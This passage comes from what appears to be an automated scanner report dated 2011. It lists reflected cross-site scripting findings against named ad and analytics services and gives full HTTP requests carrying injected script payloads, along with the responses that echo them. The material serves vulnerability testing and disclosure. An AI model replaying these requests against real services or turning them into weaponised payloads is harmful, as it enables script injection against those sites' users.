Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&fb233"-alert(1)-"19d71a463a=1&s=2377409&_salt=3393856248";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595b1"><script>alert(1)</script>d3f03646bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&595b1"><script>alert(1)</script>d3f03646bfa=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:49 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?595b1"><script>alert(1)</script>d3f03646bfa=1&Z=1x1&s=2377409&_salt=4008406020&t=2" target="_parent">
...[SNIP]...

2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b423'-alert(1)-'25f6b002c06 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x05b423'-alert(1)-'25f6b002c06&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:56 GMT
Content-Length: 503

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x05b423'-alert(1)-'25f6b002c06&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBU
...[SNIP]...

2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8de21'-alert(1)-'54cf1ba13ce was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=864008de21'-alert(1)-'54cf1ba13ce HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=864008de21'-alert(1)-'54cf1ba13ce&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D2
...[SNIP]...

2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da557'-alert(1)-'2b810b2be8e was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1da557'-alert(1)-'2b810b2be8e&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:14 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1da557'-alert(1)-'2b810b2be8e&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D162050
...[SNIP]...

2.11. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f594'-alert(1)-'282e6498410 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=16205091f594'-alert(1)-'282e6498410&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:00 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=16205091f594'-alert(1)-'282e6498410&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type
...[SNIP]...

2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 93296<script>alert(1)</script>12a9537ccd was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd)

2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a110d<script>alert(1)</script>497df2cabeb was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=a110d<script>alert(1)</script>497df2cabeb HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a110d<script>alert(1)</script>497df2cabeb

2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload be0db<script>alert(1)</script>f34e1e517d7 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 12 Sep 2011 12:48:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3926

chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7([{"i": "MT: 0", "path": "\/", "visitors": 38}, {"i": "Morning Links: Is Paul Krugman OK? | The New York Observer", "path": "\/2011\/09\/morning-links-is-paul-krugman-ok\/", "visitors": 10}, {"i": "Cre
...[SNIP]...

2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 32eb5<script>alert(1)</script>e1d9a8838e6 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=232eb5<script>alert(1)</script>e1d9a8838e6&c2=6035470&c3=&c4=/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 26 Sep 2011 12:50:03 GMT
Date: Mon, 12 Sep 2011 12:50:03 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"232eb5<script>alert(1)</script>e1d9a8838e6", c2:"6035470", c3:"", c4:"/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8de00<script>alert(1)</script>5287633e421 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421&_=1315849740224 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 634
Connection: keep-alive

jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421({
"content": "",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"Location": [

...[SNIP]...

2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54cb5<script>alert(1)</script>2964cc901df was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status?verbosity=9&callback=jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df&_=1315849736810 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 435
Connection: keep-alive

jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df({
"content": "29",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase"
...[SNIP]...

2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c26c7<script>alert(1)</script>39da3c5bada was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada&_=1315850662055 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 13:04:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6204
Connection: keep-alive

jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada({
"content": [
{
"read_only": 0,
"modified_timestamp": 1315831726,
"resource_name": "end_user",
"award_summaries": [],
"best_gue
...[SNIP]...

2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6b724<script>alert(1)</script>5bfe554e92d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection?attribute_friendly_id=bdm-quest&max_records=15&completion=complete&order_by=-created&verbosity=9&callback=jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d&_=1315849741737 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 353
Connection: keep-alive

jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d({
"content": [
[],
{}
],
"headers": {
"Content-Type": [
"application/json; charset=utf-8"
],
"Vary": [
"Authorization"

...[SNIP]...

2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c780e<script>alert(1)</script>f8f059caaeb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

